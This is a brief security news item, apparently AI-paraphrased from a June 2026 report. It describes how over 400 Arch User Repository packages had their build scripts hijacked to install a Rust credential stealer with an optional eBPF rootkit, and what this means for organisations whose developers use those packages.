Bottom line: Over 400 compromised AUR packages distribute a Rust-based infostealer with eBPF rootkit backup for kernel-level persistence.
Attackers this week hijacked over 400 packages in the Arch User Repository (AUR) and manipulated their build scripts to install a credential stealer on development machines. The malware is an infostealer written in Rust that, when running with root privileges, can additionally load an eBPF rootkit.
The attackers modified the build scripts (PKGBUILDs) of over 400 packages in the Arch User Repository to automatically infect users who compiled and installed these packages with the infostealer. The AUR is Arch Linux’s community package collection and is maintained and used by developers who contribute packages outside the official repository.
The malware collects developer credentials and secrets from the compromised machine. Once executed with root privileges, it additionally loads an eBPF rootkit that can hide itself at kernel level and become persistent — a significantly more sophisticated persistence strategy than classical user-space malware.
For CISOs, this incident represents a considerable risk: developers who use AUR packages or install from the AUR themselves may have their SSH keys, API tokens, certificates, and other credentials compromised. The combination of infostealer and eBPF rootkit enables the attacker to establish itself in the system even after removal of user-space malware and to perform further actions.
Source: thehackernews.com · Published June 12, 2026
Lumi AI News — AI-assisted curation pursuant to Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.